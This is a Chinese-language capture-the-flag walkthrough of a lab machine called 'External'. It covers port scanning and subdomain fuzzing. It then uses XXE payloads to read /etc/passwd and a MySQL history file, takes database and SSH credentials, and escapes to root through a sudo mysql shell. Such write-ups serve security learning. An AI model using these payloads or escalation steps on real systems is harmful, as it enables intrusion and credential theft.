# 靶场搭建
下载:External
Nat、IP: 192.168.1.139
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-server-header: Apache/2.4.56 (Debian) | |
|_http-title: 404 Not Found | |
3306/tcp open mysql MySQL 5.5.5-10.5.19-MariaDB-0+deb11u2 | |
| mysql-info: | |
| Protocol: 10 | |
| Version: 5.5.5-10.5.19-MariaDB-0+deb11u2 | |
| Thread ID: 7 | |
| Capabilities flags: 63486 | |
| Some Capabilities: Support41Auth, InteractiveClient, Speaks41ProtocolOld, SupportsLoadDataLocal, ConnectWithDatabase, SupportsTransactions, IgnoreSpaceBeforeParenthesis, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolNew, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, FoundRows, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults | |
| Status: Autocommit | |
| Salt: *fGoy2*yF2e(7xz}$9/# | |
|_ Auth Plugin Name: mysql_native_password |
F12 源代码提示添加 DNS: ext.nyx
,但是无果,于是爆破子域名
┌──(root㉿kali)-[~] | |
└─# wfuzz -t 200 -c --hw=24 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.ext.nyx" http://ext.nyx | |
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. | |
******************************************************** | |
* Wfuzz 3.1.0 - The Web Fuzzer * | |
******************************************************** | |
Target: http://ext.nyx/ | |
Total requests: 114441 | |
===================================================================== | |
ID Response Lines Word Chars Payload | |
===================================================================== | |
000007602: 200 25 L 56 W 1089 Ch "administrator" |
添加到 host 中
访问,注册,发现 post 的数据格式是 xml
那么测试一下存不存在 XXE
┌──(root㉿kali)-[~] | |
└─# curl --X POST "http://administrator.ext.nyx/form.php" -d '<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE foo [<!ENTITY myentity "XXE VULNERABLE!"> ]> | |
<details> | |
<email> | |
&myentity; | |
</email> | |
<password>1234</password> | |
</details>' | |
curl: (6) Could not resolve host: POST | |
<p align='center'> <font color=white size='5pt'> | |
XXE VULNERABLE! | |
is already registered! </font> </p> |
发现存在的,那么我们包含以下 passwd:
┌──(root㉿kali)-[~] | |
└─# curl --X POST "http://administrator.ext.nyx/form.php" -d '<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> | |
<details> | |
<email> | |
&xxe; | |
</email> | |
<password>1234</password> | |
</details>' | |
curl: (6) Could not resolve host: POST | |
<p align='center'> <font color=white size='5pt'> | |
root:x:0:0:root:/root:/bin/bash | |
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
sync:x:4:65534:sync:/bin:/bin/sync | |
games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin | |
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin | |
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin | |
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin | |
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin | |
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin | |
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin | |
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin | |
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin | |
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin | |
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | |
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin | |
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin | |
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin | |
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin | |
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin | |
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin | |
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin | |
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false | |
admin:x:1000:1000:admin,,,:/home/admin:/bin/bash | |
is already registered! </font> </p> |
拿到了 passwd,结合之前的扫描结果知道运行了数据库,包含一下数据库的历史记录
┌──(root㉿kali)-[~] | |
└─# curl --X POST "http://administrator.ext.nyx/form.php" -d '<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///home/admin/.mysql_history"> ]> | |
<details> | |
<email> | |
&xxe; | |
</email> | |
<password>1234</password> | |
</details>' | |
curl: (6) Could not resolve host: POST | |
<p align='center'> <font color=white size='5pt'> | |
ALTER USER 'root'@'%' IDENTIFIED BY 'r00tt00rDB'; | |
exit; | |
is already registered! </font> </p> |
得到了数据库的账号密码: r00tt00rDB
登录数据库,查询数据
┌──(root㉿kali)-[~] | |
└─# mysql -h 192.168.1.139 -u root -pr00tt00rDB | |
Welcome to the MariaDB monitor. Commands end with ; or \g. | |
Your MariaDB connection id is 5 | |
Server version: 10.5.19-MariaDB-0+deb11u2 Debian 11 | |
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. | |
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. | |
MariaDB [(none)]> show databases; | |
+--------------------+ | |
| Database | | |
+--------------------+ | |
| admindb | | |
| information_schema | | |
| mysql | | |
| performance_schema | | |
+--------------------+ | |
4 rows in set (0.004 sec) | |
MariaDB [(none)]> use admindb | |
Reading table information for completion of table and column names | |
You can turn off this feature to get a quicker startup with -A | |
Database changed | |
MariaDB [admindb]> show tables; | |
+-------------------+ | |
| Tables_in_admindb | | |
+-------------------+ | |
| credentials | | |
+-------------------+ | |
1 row in set (0.001 sec) | |
MariaDB [admindb]> select * from credentials; | |
+------+-------+--------------------------+ | |
| id | user | password | | |
+------+-------+--------------------------+ | |
| 1 | admin | 4dminDBS3cur3P4ssw0rd123 | | |
+------+-------+--------------------------+ | |
1 row in set (0.005 sec) |
拿到账号密码,ssh 到 admin
# 提权
sudo -l
发现数据库有 sudo 权限
admin@external:~$ sudo mysql -pr00tt00rDB -e '\! /bin/sh' | |
# cat /root/root.txt | |
059ca941ad55fd318d68e675f85dd733 |
拿到了 root 权限